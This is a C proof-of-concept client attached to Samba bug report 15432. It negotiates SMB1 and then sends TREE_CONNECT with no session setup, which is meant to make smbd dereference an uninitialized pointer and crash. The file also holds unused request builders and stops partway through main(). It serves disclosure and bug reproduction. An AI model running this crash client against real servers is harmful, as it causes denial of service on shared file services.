The Samba-Bugzilla – Attachment 17997 Details for
Bug 15432
TREE_CONNECT without SETUP causes smbd to use uninitialized pointer
client that sends TREE_CONNECT without SETUP, potentially crashing smbd
smbd13c.c (text/x-csrc), 22.66 KB, created by
Robert Morris
on 2023-07-24 20:49:42 UTC
Description:
client that sends TREE_CONNECT without SETUP, potentially crashing smbd
Robert Morris
Created:
2023-07-24 20:49:42 UTC
Size:
22.66 KB
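/*
 * smbd13c.c -- minimal SMB1 (CIFS) client attached to Samba bug 15432
 * ("TREE_CONNECT without SETUP causes smbd to use uninitialized pointer").
 *
 * main() negotiates a dialect and then sends SMB_COM_TREE_CONNECT without
 * any preceding SMB_COM_SESSION_SETUP_ANDX, which is the condition the bug
 * report describes.  The remaining request builders (setup, nt_create,
 * the transaction variants, ...) are the author's exploratory code and are
 * not called from main(); their on-wire layout is preserved unchanged.
 *
 * Every request is sent as the whole fixed-size stack buffer (128 or 256
 * bytes) with the NetBIOS length set to "buffer size minus 4", so the
 * trailing fill bytes from memset() go on the wire as well.  That was the
 * original author's choice ("this works") and is kept.
 *
 * Changes from the attached original: multi-byte fields are stored and
 * loaded byte-wise instead of through unaligned (short *)/(int *) casts,
 * string copies into the request buffers are bounds-checked, readmsg()
 * takes the capacity of the response buffer, partial write()s are
 * handled, and socket()/inet_addr() results are checked in main().
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ctype.h>
#include <fcntl.h>
#include <signal.h>

/* Connection parameters as the original author set them; the IPC$
 * alternatives are kept, commented out, for reference. */
char *server_ip = "127.0.0.1";
char *username = "z";
char *password = "xxxxxxxx";   /* setup() sends exactly 8 bytes of this */
char *share_path = "x";
//char *share_path = "IPC$";
char *share_service = "A:";
//char *share_service = "IPC";

int s = -1;     /* connected TCP socket, -1 until main() connects */
int uid = 0;    /* UID returned by setup(), placed in every header */
int tid = 0;    /* TID returned by tree_connect*(), placed in every header */
int fid = 0;    /* FID returned by nt_create(), used by smb_ioctl()/transaction() */

unsigned int header_flags = 0;
unsigned int header_flags2 = 0;

/*
 * Field encoders/decoders.  SMB fields are little-endian on the wire; the
 * 4-byte NetBIOS session header carries its length big-endian.  Byte-wise
 * access replaces the original's unaligned `*(short *)(buf+ii) = v` stores,
 * which are undefined behaviour under strict aliasing and only happened to
 * produce little-endian bytes on the author's machine.
 */
static void put_le16(char *p, unsigned v)
{
    p[0] = (char)(v & 0xff);
    p[1] = (char)((v >> 8) & 0xff);
}

static void put_le32(char *p, unsigned long v)
{
    p[0] = (char)(v & 0xff);
    p[1] = (char)((v >> 8) & 0xff);
    p[2] = (char)((v >> 16) & 0xff);
    p[3] = (char)((v >> 24) & 0xff);
}

static void put_be16(char *p, unsigned v)
{
    p[0] = (char)((v >> 8) & 0xff);
    p[1] = (char)(v & 0xff);
}

static unsigned get_le16(const unsigned char *p)
{
    return (unsigned)p[0] | ((unsigned)p[1] << 8);
}

static unsigned long get_le32(const unsigned char *p)
{
    return (unsigned long)p[0] | ((unsigned long)p[1] << 8) |
           ((unsigned long)p[2] << 16) | ((unsigned long)p[3] << 24);
}

/* Advance ii to the next multiple of four without writing anything; the
 * skipped bytes keep the caller's memset() fill (Pad1/Pad2 of the
 * transaction requests). */
static int pad4(int ii)
{
    while (ii % 4)
        ii++;
    return ii;
}

/* Copy len bytes of src into buf at *ii and advance *ii.  Exits instead
 * of overrunning the cap-byte buffer; the original memcpy()'d the global
 * strings (share_path, username, ...) into 128-byte buffers unchecked. */
static void append(char *buf, size_t cap, int *ii, const void *src, size_t len)
{
    if (*ii < 0 || (size_t)*ii > cap || len > cap - (size_t)*ii) {
        fprintf(stderr, "request does not fit in %zu-byte buffer\n", cap);
        exit(1);
    }
    memcpy(buf + *ii, src, len);
    *ii += (int)len;
}

/* Append a string together with its NUL terminator. */
static void append_str(char *buf, size_t cap, int *ii, const char *str)
{
    append(buf, cap, ii, str, strlen(str) + 1);
}

/* Write exactly n bytes to the server socket; -1 on error or EOF.  The
 * original issued a single write() and did not handle a short write. */
static int writen(const void *bufx, size_t n)
{
    const char *p = bufx;
    while (n > 0) {
        ssize_t cc = write(s, p, n);
        if (cc <= 0)
            return -1;
        n -= (size_t)cc;
        p += cc;
    }
    return 0;
}

/* Patch the NetBIOS length into buf[2..3] and send the whole size-byte
 * buffer; `what` names the request in the progress line.  Exits on a
 * write failure, as the original did. */
static void send_frame(char *buf, size_t size, const char *what)
{
    put_be16(buf + 2, (unsigned)(size - 4));   /* length excludes the 4-byte header */
    printf("%s writing %zu bytes\n", what, size);
    fflush(stdout);
    if (writen(buf, size) < 0) {
        perror("write");
        exit(1);
    }
}

/*
 * Write the 4-byte NetBIOS session header followed by the 32-byte SMB
 * header (MS-CIFS 2.2.3.1) for `command` at the start of buf and return
 * the offset of the first byte after it (36).
 *
 * The NetBIOS length is left 0 here and patched by send_frame(); the
 * original wrote htons(sizeof(buf)-4) with buf being a pointer, i.e. a
 * meaningless value that every caller overwrote anyway.  TID and UID come
 * from the globals.  The 8 SecurityFeatures bytes are skipped rather than
 * written, so they carry whatever the caller's memset() put there.
 */
int header(char *buf, int command)
{
    int ii = 0;

    buf[ii++] = 0;              /* NetBIOS message type: session message */
    buf[ii++] = 0;              /* length, high byte */
    put_be16(buf + ii, 0);      /* length, patched later by send_frame() */
    ii += 2;

    buf[ii++] = (char)0xff;     /* Protocol: "\xffSMB" */
    buf[ii++] = 'S';
    buf[ii++] = 'M';
    buf[ii++] = 'B';
    buf[ii++] = (char)command;
    put_le32(buf + ii, 0);      /* Status */
    ii += 4;
    buf[ii++] = (char)header_flags;
    put_le16(buf + ii, header_flags2);
    ii += 2;
    put_le16(buf + ii, 0);      /* PIDHigh */
    ii += 2;
    ii += 8;                    /* SecurityFeatures: left as buffer fill */
    put_le16(buf + ii, 0);      /* Reserved */
    ii += 2;
    put_le16(buf + ii, (unsigned)tid);
    ii += 2;
    put_le16(buf + ii, 0);      /* PIDLow */
    ii += 2;
    put_le16(buf + ii, (unsigned)uid);
    ii += 2;
    put_le16(buf + ii, 0);      /* MID */
    ii += 2;

    return ii;
}

/* Read exactly n bytes from the server socket; -1 on error or EOF. */
int readn(void *bufx, size_t n)
{
    char *buf = bufx;
    while (n > 0) {
        ssize_t cc = read(s, buf, n);
        if (cc <= 0)
            return -1;
        n -= (size_t)cc;
        buf += cc;
    }
    return 0;
}

/*
 * Read one NetBIOS-framed message into the cap-byte buffer bufx: the
 * 4-byte header, then as many payload bytes as bytes 2..3 announce.
 * Returns the total number of bytes read, or -1 on a read error, EOF, or
 * a message that would not fit.  The original trusted the announced
 * length and read it into a fixed 1024-byte buffer; a server reply longer
 * than that would have overrun the caller's stack.  Byte 1 of the header
 * (the high length bits) is ignored, as in the original.
 */
int readmsg(void *bufx, size_t cap)
{
    unsigned char *buf = bufx;
    if (cap < 4)
        return -1;
    if (readn(buf, 4) < 0)
        return -1;
    size_t n = ((size_t)buf[2] << 8) | buf[3];
    if (n > cap - 4) {
        fprintf(stderr, "readmsg: %zu-byte message exceeds %zu-byte buffer\n", n, cap);
        return -1;
    }
    if (readn(buf + 4, n) < 0)
        return -1;
    return (int)(n + 4);
}

/* SMB_COM_NEGOTIATE (MS-CIFS 2.2.4.52) offering the single dialect
 * `dialect` (the original author's note: should probably be "NT LM 0.12"),
 * then read the response and print a few of its fields. */
void negotiate(const char *dialect)
{
    {
        char buf[128];
        memset(buf, 1, sizeof buf);

        int ii = header(buf, 0x72);

        /* parameter block, MS-CIFS 2.2.3.2: no parameter words */
        int param_words = 0;
        buf[ii++] = (char)param_words;
        printf("parameters start at %d\n", ii);
        ii += param_words * 2;

        /* data block, MS-CIFS 2.2.3.3: ByteCount, then one dialect entry */
        int bci = ii;
        put_le16(buf + ii, 0);      /* ByteCount, filled below */
        ii += 2;
        buf[ii++] = 0x02;           /* BufferFormat: Dialect */
        append_str(buf, sizeof buf, &ii, dialect);

        put_le16(buf + bci, (unsigned)(ii - bci - 2));

        assert((size_t)ii <= sizeof buf);
        send_frame(buf, sizeof buf, "negotiate");
    }

    {
        /* negotiate response, MS-CIFS 2.2.4.52.2 */
        unsigned char buf[1024];
        memset(buf, 0, sizeof buf);
        int cc = readmsg(buf, sizeof buf);
        printf("read %d for negotiate response (expecting 87)\n", cc);
        printf("WordCount %d (expecting 17)\n", buf[36]);
        printf("DialectIndex %u (expecting 0)\n", get_le16(buf + 37));
        printf("SecurityMode 0x%x (expecting 0x1)\n", buf[39]);
    }
}

/* SMB_COM_SESSION_SETUP_ANDX (MS-CIFS 2.2.4.53) with an 8-byte OEM
 * password and no Unicode password; reads the response and stores the
 * UID the server assigned.  Not called from main(). */
void setup(void)
{
    {
        char buf[128];
        memset(buf, 1, sizeof buf);

        int ii = header(buf, 0x73);

        /* parameter block, MS-CIFS 2.2.4.53.1 */
        int param_words = 13;
        buf[ii++] = (char)param_words;
        buf[ii++] = (char)0xff;     /* AndXCommand: none */
        buf[ii++] = 0;              /* AndXReserved */
        put_le16(buf + ii, 0);      /* AndXOffset */
        ii += 2;
        put_le16(buf + ii, 8192);   /* MaxBufferSize */
        ii += 2;
        put_le16(buf + ii, 2);      /* MaxMpxCount */
        ii += 2;
        put_le16(buf + ii, 0);      /* VcNumber */
        ii += 2;
        put_le32(buf + ii, 0);      /* SessionKey; author's XXX: should come from the negotiate response */
        ii += 4;
        put_le16(buf + ii, 8);      /* OEMPasswordLen */
        ii += 2;
        put_le16(buf + ii, 0);      /* UnicodePasswordLen */
        ii += 2;
        put_le32(buf + ii, 0);      /* Reserved */
        ii += 4;
        put_le32(buf + ii, 0);      /* Capabilities */
        ii += 4;

        /* data block */
        int bci = ii;
        put_le16(buf + ii, 0);      /* ByteCount, filled below */
        ii += 2;
        /* OEMPassword: exactly 8 bytes of the global, so it must be that long. */
        if (strlen(password) < 8) {
            fprintf(stderr, "password must be at least 8 bytes\n");
            exit(1);
        }
        append(buf, sizeof buf, &ii, password, 8);
        /* UnicodePassword: none.  The original's pad test was `ii % 1`,
         * which is never true, so no pad byte is ever emitted; that
         * layout is preserved here. */
        append_str(buf, sizeof buf, &ii, username);     /* AccountName */
        append(buf, sizeof buf, &ii, "\0\0", 3);        /* PrimaryDomain, NativeOS, NativeLanMan: empty */

        put_le16(buf + bci, (unsigned)(ii - bci - 2));

        assert((size_t)ii <= sizeof buf);
        send_frame(buf, sizeof buf, "setup");
    }

    {
        /* session setup response, MS-CIFS 2.2.4.53.2 */
        unsigned char buf[1024];
        memset(buf, 0, sizeof buf);
        int cc = readmsg(buf, sizeof buf);
        printf("read %d for session setup response\n", cc);
        printf("WordCount %d\n", buf[36]);
        printf("Action %u (expecting 0)\n", get_le16(buf + 41));
        uid = (int)get_le16(buf + 32);  /* UID field of the response header */
        printf("UID 0x%x\n", uid);
    }
}

/* SMB_COM_TREE_CONNECT_ANDX (MS-CIFS 2.2.4.55) to share_path/share_service
 * with a one-byte empty password; stores the returned TID.  Not called
 * from main(). */
void tree_connect_andx(void)
{
    {
        char buf[128];
        memset(buf, 1, sizeof buf);

        int ii = header(buf, 0x75);

        /* parameter block */
        int param_words = 4;
        buf[ii++] = (char)param_words;
        buf[ii++] = (char)0xff;     /* AndXCommand: none */
        buf[ii++] = 0;              /* AndXReserved */
        put_le16(buf + ii, 0);      /* AndXOffset */
        ii += 2;
        put_le16(buf + ii, 0);      /* Flags */
        ii += 2;
        put_le16(buf + ii, 1);      /* PasswordLength */
        ii += 2;

        /* data block */
        int bci = ii;
        put_le16(buf + ii, 0);      /* ByteCount, filled below */
        ii += 2;
        buf[ii++] = '\0';           /* Password */
        append_str(buf, sizeof buf, &ii, share_path);
        append_str(buf, sizeof buf, &ii, share_service);

        put_le16(buf + bci, (unsigned)(ii - bci - 2));

        assert((size_t)ii <= sizeof buf);
        send_frame(buf, sizeof buf, "tree_connect_andx");
    }

    {
        /* tree connect response, MS-CIFS 2.2.4.55.2 */
        unsigned char buf[1024];
        memset(buf, 0, sizeof buf);
        int cc = readmsg(buf, sizeof buf);
        printf("read %d for tree_connect_andx response\n", cc);
        tid = (int)get_le16(buf + 28);  /* TID field of the response header */
        printf("TID 0x%x\n", tid);
    }
}

/* SMB_COM_TREE_CONNECT (MS-CIFS 2.2.4.50), the non-ANDX form, sent with
 * the UID still 0 because main() never calls setup().  This is the request
 * the bug report is about.  Stores the returned TID. */
void tree_connect(void)
{
    {
        char buf[128];
        memset(buf, 1, sizeof buf);

        int ii = header(buf, 0x70);

        buf[ii++] = 0;              /* WordCount: no parameter words */

        /* data block: three SMB_STRING (0x04) fields */
        int bci = ii;
        put_le16(buf + ii, 0);      /* ByteCount, filled below */
        ii += 2;

        buf[ii++] = 0x04;           /* BufferFormat */
        append_str(buf, sizeof buf, &ii, share_path);   /* Path */

        buf[ii++] = 0x04;           /* BufferFormat */
        buf[ii++] = '\0';           /* Password: empty */

        buf[ii++] = 0x04;           /* BufferFormat */
        append_str(buf, sizeof buf, &ii, share_service); /* Service */

        put_le16(buf + bci, (unsigned)(ii - bci - 2));

        assert((size_t)ii <= sizeof buf);
        send_frame(buf, sizeof buf, "tree_connect");
    }

    {
        /* SMB_COM_TREE_CONNECT response; the TID is read from the header */
        unsigned char buf[1024];
        memset(buf, 0, sizeof buf);
        int cc = readmsg(buf, sizeof buf);
        printf("read %d for tree connect response\n", cc);
        tid = (int)get_le16(buf + 28);
        printf("TID 0x%x\n", tid);
    }
}

/* SMB_COM_NT_CREATE_ANDX (MS-CIFS 2.2.4.64) opening the one-character
 * name "f"; stores the returned FID.  Not called from main(). */
void nt_create(void)
{
    {
        char buf[128];
        memset(buf, 0xff, sizeof buf);

        int ii = header(buf, 0xa2);

        /* parameter block */
        int param_words = 0x18;
        buf[ii++] = (char)param_words;

        buf[ii++] = (char)0xff;     /* AndXCommand: none */
        buf[ii++] = 0;              /* AndXReserved */
        put_le16(buf + ii, 0);      /* AndXOffset */
        ii += 2;
        buf[ii++] = 0;              /* Reserved */
        put_le16(buf + ii, 1);      /* NameLength */
        ii += 2;
        put_le32(buf + ii, 0);      /* Flags */
        ii += 4;
        put_le32(buf + ii, 0);      /* RootDirectoryFID */
        ii += 4;
        put_le32(buf + ii, 7);      /* DesiredAccess */
        ii += 4;
        memset(buf + ii, 0, 8);     /* AllocationSize */
        ii += 8;
        put_le32(buf + ii, 0);      /* ExtFileAttributes */
        ii += 4;
        put_le32(buf + ii, 7);      /* ShareAccess */
        ii += 4;
        put_le32(buf + ii, 0);      /* CreateDisposition */
        ii += 4;
        put_le32(buf + ii, 0);      /* CreateOptions */
        ii += 4;
        put_le32(buf + ii, 0);      /* ImpersonationLevel */
        ii += 4;
        buf[ii++] = 0;              /* SecurityFlags */

        /* data block */
        int bci = ii;
        put_le16(buf + ii, 0);      /* ByteCount, filled below */
        ii += 2;
        buf[ii++] = 'f';            /* FileName, no terminator (NameLength is 1) */

        put_le16(buf + bci, (unsigned)(ii - bci - 2));

        assert((size_t)ii <= sizeof buf);
        send_frame(buf, sizeof buf, "nt_create");
    }

    {
        unsigned char buf[1024];
        memset(buf, 0, sizeof buf);
        int cc = readmsg(buf, sizeof buf);
        printf("read %d for nt_create response\n", cc);
        fid = (int)get_le16(buf + 42);
        printf("FID 0x%04x\n", fid);
    }
}

/* SMB_COM_CHECK_DIRECTORY (MS-CIFS 2.2.4.17) for `name`; prints the
 * Status field of the response.  Not called from main(). */
void check_directory(const char *name)
{
    {
        char buf[128];
        memset(buf, 0xff, sizeof buf);

        int ii = header(buf, 0x10);

        /* parameter block: none */
        int param_words = 0x00;
        buf[ii++] = (char)param_words;

        /* data block */
        int bci = ii;
        put_le16(buf + ii, 0);      /* ByteCount, filled below */
        ii += 2;
        buf[ii++] = 0x04;           /* BufferFormat: SMB_STRING */
        append_str(buf, sizeof buf, &ii, name);

        put_le16(buf + bci, (unsigned)(ii - bci - 2));

        assert((size_t)ii <= sizeof buf);
        send_frame(buf, sizeof buf, "check_directory");
    }

    {
        unsigned char buf[1024];
        memset(buf, 0, sizeof buf);
        int cc = readmsg(buf, sizeof buf);
        printf("read %d for check_directory response\n", cc);
        printf("check_directory Status 0x%lx\n", get_le32(buf + 9));   /* Status at header offset 5 */
    }
}

/* SMB_COM_IOCTL (MS-CIFS 2.2.4.35) on the global fid with 48 bytes of
 * 0xff fill as parameters/data.  Not called from main(). */
void smb_ioctl(void)
{
    {
        char buf[128];
        memset(buf, 0xff, sizeof buf);

        int ii = header(buf, 0x27);

        /* parameter block */
        int param_words = 0x0e;
        buf[ii++] = (char)param_words;

        put_le16(buf + ii, (unsigned)fid);  /* FID */
        ii += 2;
        put_le16(buf + ii, 0x53);   /* Category */
        ii += 2;
        put_le16(buf + ii, 0x60);   /* Function */
        ii += 2;
        put_le16(buf + ii, 8);      /* TotalParameterCount */
        ii += 2;
        put_le16(buf + ii, 8);      /* TotalDataCount */
        ii += 2;
        put_le16(buf + ii, 8);      /* MaxParameterCount */
        ii += 2;
        put_le16(buf + ii, 8);      /* MaxDataCount */
        ii += 2;
        put_le32(buf + ii, 1000000); /* Timeout (ms) */
        ii += 4;
        put_le16(buf + ii, 0);      /* Reserved */
        ii += 2;
        put_le16(buf + ii, 8);      /* ParameterCount */
        ii += 2;
        put_le16(buf + ii, 0);      /* ParameterOffset */
        ii += 2;
        put_le16(buf + ii, 8);      /* DataCount */
        ii += 2;
        put_le16(buf + ii, 0);      /* DataOffset */
        ii += 2;

        /* data block */
        int bci = ii;
        put_le16(buf + ii, 0);      /* ByteCount, filled below */
        ii += 2;
        ii += 48;                   /* 48 bytes left as 0xff fill */

        put_le16(buf + bci, (unsigned)(ii - bci - 2));

        assert((size_t)ii <= sizeof buf);
        send_frame(buf, sizeof buf, "ioctl");
    }

    {
        unsigned char buf[1024];
        memset(buf, 0, sizeof buf);
        int cc = readmsg(buf, sizeof buf);
        printf("read %d for ioctl response\n", cc);
    }
}

/* SMB_COM_TRANSACTION2 (MS-CIFS 2.2.4.46) carrying a TRANS2_OPEN2 for the
 * name "t" with a small extended-attribute list.  Not called from main().
 * The ParameterOffset/DataOffset fields are back-patched once the padded
 * positions are known; the author's "XXX" on ParameterOffset is kept as a
 * reminder that the fixed counts were not re-derived from the layout. */
void transaction2(void)
{
    {
        char buf[256];
        memset(buf, 0xff, sizeof buf);

        int ii = header(buf, 0x32);

        /* parameter block */
        int param_words = 14 + 1;   /* 14 + SetupCount */
        buf[ii++] = (char)param_words;

        put_le16(buf + ii, 32);     /* TotalParameterCount */
        ii += 2;
        put_le16(buf + ii, 15);     /* TotalDataCount */
        ii += 2;
        put_le16(buf + ii, 256);    /* MaxParameterCount */
        ii += 2;
        put_le16(buf + ii, 8192);   /* MaxDataCount */
        ii += 2;
        buf[ii++] = 64;             /* MaxSetupCount */
        buf[ii++] = 0;              /* Reserved1 */
        put_le16(buf + ii, 0);      /* Flags */
        ii += 2;
        put_le32(buf + ii, 1000000); /* Timeout, in ms */
        ii += 4;
        put_le16(buf + ii, 0);      /* Reserved2 */
        ii += 2;
        put_le16(buf + ii, 32);     /* ParameterCount */
        ii += 2;
        int parameter_offset_i = ii;
        put_le16(buf + ii, 32);     /* ParameterOffset XXX, patched below */
        ii += 2;
        put_le16(buf + ii, 15);     /* DataCount */
        ii += 2;
        int data_offset_i = ii;
        put_le16(buf + ii, 32);     /* DataOffset, patched below */
        ii += 2;
        buf[ii++] = 1;              /* SetupCount */
        buf[ii++] = 0;              /* Reserved3 */

        /* Setup words */
        put_le16(buf + ii, 0);      /* sub-command: TRANS2_OPEN2 */
        ii += 2;

        /* data block */
        int bci = ii;
        put_le16(buf + ii, 0);      /* ByteCount, filled below */
        ii += 2;

        buf[ii++] = 0;              /* Name */
        ii = pad4(ii);              /* Pad1 */

        put_le16(buf + parameter_offset_i, (unsigned)(ii - 4)); /* offset from the SMB header */

        /* TRANS2_OPEN2 parameters */
        put_le16(buf + ii, 0);      /* Flags */
        ii += 2;
        put_le16(buf + ii, 0);      /* AccessMode */
        ii += 2;
        put_le16(buf + ii, 0);      /* Reserved1 */
        ii += 2;
        put_le16(buf + ii, 0);      /* FileAttributes */
        ii += 2;
        put_le32(buf + ii, 1);      /* CreationTime */
        ii += 4;
        put_le16(buf + ii, 0x11);   /* OpenMode */
        ii += 2;
        put_le32(buf + ii, 0);      /* AllocationSize */
        ii += 4;
        memset(buf + ii, 0, 10);    /* Reserved */
        ii += 10;
        append_str(buf, sizeof buf, &ii, "t");  /* FileName */

        ii = pad4(ii);              /* Pad2 */

        put_le16(buf + data_offset_i, (unsigned)(ii - 4));

        /* Extended AttributeList: one attribute "aaa" = "bbb" */
        put_le32(buf + ii, 12);     /* SizeOfListInBytes */
        ii += 4;
        buf[ii++] = 0;              /* ExtendedAttributeFlag */
        buf[ii++] = 3;              /* AttributeNameLengthInBytes */
        put_le16(buf + ii, 3);      /* ValueLengthInBytes */
        ii += 2;
        append(buf, sizeof buf, &ii, "aaa", 4);
        append(buf, sizeof buf, &ii, "bbb", 4);

        put_le16(buf + bci, (unsigned)(ii - bci - 2));

        assert((size_t)ii <= sizeof buf);
        send_frame(buf, sizeof buf, "transaction2");
    }

    {
        unsigned char buf[1024];
        memset(buf, 0, sizeof buf);
        int cc = readmsg(buf, sizeof buf);
        printf("read %d for transaction2 response\n", cc);
    }
}

/* SMB_COM_NT_TRANSACT (MS-CIFS 2.2.4.62), Function 1 (NT_TRANSACT_CREATE)
 * for the name "t" with a small extended-attribute list.  Not called from
 * main().  SetupCount is 0 yet one setup word is still written; that is
 * how the original laid it out and is preserved. */
void nt_transaction(void)
{
    {
        char buf[256];
        memset(buf, 0xff, sizeof buf);

        int ii = header(buf, 0xa0);

        /* parameter block */
        int param_words = 19 + 0;   /* 19 + SetupCount */
        buf[ii++] = (char)param_words;

        buf[ii++] = 64;             /* MaxSetupCount */
        put_le16(buf + ii, 0);      /* Reserved1 */
        ii += 2;
        put_le32(buf + ii, 54);     /* TotalParameterCount */
        ii += 4;
        put_le32(buf + ii, 15);     /* TotalDataCount */
        ii += 4;
        put_le32(buf + ii, 256);    /* MaxParameterCount */
        ii += 4;
        put_le32(buf + ii, 8192);   /* MaxDataCount */
        ii += 4;
        put_le32(buf + ii, 54);     /* ParameterCount */
        ii += 4;
        int parameter_offset_i = ii;
        put_le32(buf + ii, 32);     /* ParameterOffset XXX, patched below */
        ii += 4;
        put_le32(buf + ii, 15);     /* DataCount */
        ii += 4;
        int data_offset_i = ii;
        put_le32(buf + ii, 32);     /* DataOffset, patched below */
        ii += 4;
        buf[ii++] = 0;              /* SetupCount */
        put_le16(buf + ii, 1);      /* Function */
        ii += 2;

        /* Setup words (written although SetupCount is 0) */
        put_le16(buf + ii, 0);
        ii += 2;

        /* data block */
        int bci = ii;
        put_le16(buf + ii, 0);      /* ByteCount, filled below */
        ii += 2;

        ii = pad4(ii);              /* Pad1 */

        put_le32(buf + parameter_offset_i, (unsigned long)(ii - 4));

        /* NT_TRANSACT_CREATE parameters */
        put_le32(buf + ii, 0);      /* Flags */
        ii += 4;
        put_le32(buf + ii, 0);      /* RootDirectoryFID */
        ii += 4;
        put_le32(buf + ii, 7);      /* DesiredAccess */
        ii += 4;
        memset(buf + ii, 0, 8);     /* AllocationSize */
        ii += 8;
        put_le32(buf + ii, 0);      /* ExtFileAttributes */
        ii += 4;
        put_le32(buf + ii, 7);      /* ShareAccess */
        ii += 4;
        put_le32(buf + ii, 0);      /* CreateDisposition */
        ii += 4;
        put_le32(buf + ii, 0);      /* CreateOptions */
        ii += 4;
        put_le32(buf + ii, 0);      /* SecurityDescriptorLength */
        ii += 4;
        put_le32(buf + ii, 0);      /* EALength */
        ii += 4;
        put_le32(buf + ii, 1);      /* NameLength */
        ii += 4;
        put_le32(buf + ii, 0);      /* ImpersonationLevel */
        ii += 4;
        buf[ii++] = 0;              /* SecurityFlags */
        append(buf, sizeof buf, &ii, "t", 1);   /* Name, no terminator (NameLength is 1) */

        ii = pad4(ii);              /* Pad2 */

        put_le32(buf + data_offset_i, (unsigned long)(ii - 4));

        /* Extended AttributeList: one attribute "aaa" = "bbb" */
        put_le32(buf + ii, 12);     /* SizeOfListInBytes */
        ii += 4;
        buf[ii++] = 0;              /* ExtendedAttributeFlag */
        buf[ii++] = 3;              /* AttributeNameLengthInBytes */
        put_le16(buf + ii, 3);      /* ValueLengthInBytes */
        ii += 2;
        append(buf, sizeof buf, &ii, "aaa", 4);
        append(buf, sizeof buf, &ii, "bbb", 4);

        put_le16(buf + bci, (unsigned)(ii - bci - 2));

        assert((size_t)ii <= sizeof buf);
        send_frame(buf, sizeof buf, "nt_transaction");
    }

    {
        unsigned char buf[1024];
        memset(buf, 0, sizeof buf);
        int cc = readmsg(buf, sizeof buf);
        printf("read %d for nt_transaction response\n", cc);
    }
}

/* SMB_COM_TRANSACTION (MS-CIFS 2.2.4.33) addressed to "\pipe\" with two
 * setup words (0 and the global fid) and the same OPEN2-style parameter
 * and EA payload as transaction2().  Not called from main(). */
void transaction(void)
{
    {
        char buf[256];
        memset(buf, 0xff, sizeof buf);

        int ii = header(buf, 0x25);

        /* parameter block */
        int param_words = 14 + 2;   /* 14 + SetupCount */
        buf[ii++] = (char)param_words;

        put_le16(buf + ii, 32);     /* TotalParameterCount */
        ii += 2;
        put_le16(buf + ii, 15);     /* TotalDataCount */
        ii += 2;
        put_le16(buf + ii, 256);    /* MaxParameterCount */
        ii += 2;
        put_le16(buf + ii, 8192);   /* MaxDataCount */
        ii += 2;
        buf[ii++] = 64;             /* MaxSetupCount */
        buf[ii++] = 0;              /* Reserved1 */
        put_le16(buf + ii, 0);      /* Flags */
        ii += 2;
        put_le32(buf + ii, 1000000); /* Timeout, in ms */
        ii += 4;
        put_le16(buf + ii, 0);      /* Reserved2 */
        ii += 2;
        put_le16(buf + ii, 32);     /* ParameterCount */
        ii += 2;
        int parameter_offset_i = ii;
        put_le16(buf + ii, 32);     /* ParameterOffset XXX, patched below */
        ii += 2;
        put_le16(buf + ii, 15);     /* DataCount */
        ii += 2;
        int data_offset_i = ii;
        put_le16(buf + ii, 32);     /* DataOffset, patched below */
        ii += 2;
        buf[ii++] = 2;              /* SetupCount */
        buf[ii++] = 0;              /* Reserved3 */

        /* Setup words; the original marks both "???" */
        put_le16(buf + ii, 0);
        ii += 2;
        put_le16(buf + ii, (unsigned)fid);
        ii += 2;

        /* data block */
        int bci = ii;
        put_le16(buf + ii, 0);      /* ByteCount, filled below */
        ii += 2;

        //char *pname = "\\pipe\\LANMAN";
        const char *pname = "\\pipe\\";
        append_str(buf, sizeof buf, &ii, pname);    /* Name */

        ii = pad4(ii);              /* Pad1 */

        put_le16(buf + parameter_offset_i, (unsigned)(ii - 4));

        put_le16(buf + ii, 1);      /* Flags */
        ii += 2;
        put_le16(buf + ii, 0);      /* AccessMode */
        ii += 2;
        put_le16(buf + ii, 0);      /* Reserved1 */
        ii += 2;
        put_le16(buf + ii, 0);      /* FileAttributes */
        ii += 2;
        put_le32(buf + ii, 1);      /* CreationTime */
        ii += 4;
        put_le16(buf + ii, 0x11);   /* OpenMode */
        ii += 2;
        put_le32(buf + ii, 0);      /* AllocationSize */
        ii += 4;
        memset(buf + ii, 0, 10);    /* Reserved */
        ii += 10;
        append_str(buf, sizeof buf, &ii, "t");  /* FileName */

        ii = pad4(ii);              /* Pad2 */

        put_le16(buf + data_offset_i, (unsigned)(ii - 4));

        /* Extended AttributeList: one attribute "aaa" = "bbb" */
        put_le32(buf + ii, 12);     /* SizeOfListInBytes */
        ii += 4;
        buf[ii++] = 0;              /* ExtendedAttributeFlag */
        buf[ii++] = 3;              /* AttributeNameLengthInBytes */
        put_le16(buf + ii, 3);      /* ValueLengthInBytes */
        ii += 2;
        append(buf, sizeof buf, &ii, "aaa", 4);
        append(buf, sizeof buf, &ii, "bbb", 4);

        put_le16(buf + bci, (unsigned)(ii - bci - 2));

        assert((size_t)ii <= sizeof buf);
        send_frame(buf, sizeof buf, "transaction");
    }

    {
        unsigned char buf[1024];
        memset(buf, 0, sizeof buf);
        int cc = readmsg(buf, sizeof buf);
        printf("read %d for transaction response\n", cc);
    }
}

/* SMB_COM_LOGOFF_ANDX (MS-CIFS 2.2.4.54) with an empty data block.  Not
 * called from main().  AndXOffset is set to the current offset, which the
 * original spelled `ii - 4 + 4`. */
void smb_logoff(void)
{
    {
        char buf[256];
        memset(buf, 0xff, sizeof buf);

        int ii = header(buf, 0x74);

        /* parameter block */
        buf[ii++] = 2;              /* WordCount */
        buf[ii++] = (char)0xff;     /* AndXCommand: none */
        buf[ii++] = 0;              /* AndXReserved */
        put_le16(buf + ii, (unsigned)ii);   /* AndXOffset */
        ii += 2;

        /* data block: ByteCount 0, nothing else */
        put_le16(buf + ii, 0);
        ii += 2;

        assert((size_t)ii <= sizeof buf);
        send_frame(buf, sizeof buf, "logoff");
    }

    {
        unsigned char buf[1024];
        memset(buf, 0, sizeof buf);
        int cc = readmsg(buf, sizeof buf);
        printf("read %d for logoff response\n", cc);
    }
}

/*
 * Connect to server_ip:445 (retrying once a second until the server
 * accepts), negotiate, and send the TREE_CONNECT that reproduces the bug.
 * Returns 0 after closing the socket; exits non-zero on a setup error.
 */
int main(void)
{
    /* No core dumps from this client. */
    struct rlimit r;
    r.rlim_cur = r.rlim_max = 0;
    setrlimit(RLIMIT_CORE, &r);

    /* A server that drops the connection must not kill us with SIGPIPE;
     * the write() then fails and send_frame() reports it instead. */
    signal(SIGPIPE, SIG_IGN);

    struct sockaddr_in sin;
    memset(&sin, 0, sizeof sin);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(445);      /* SMB over TCP */
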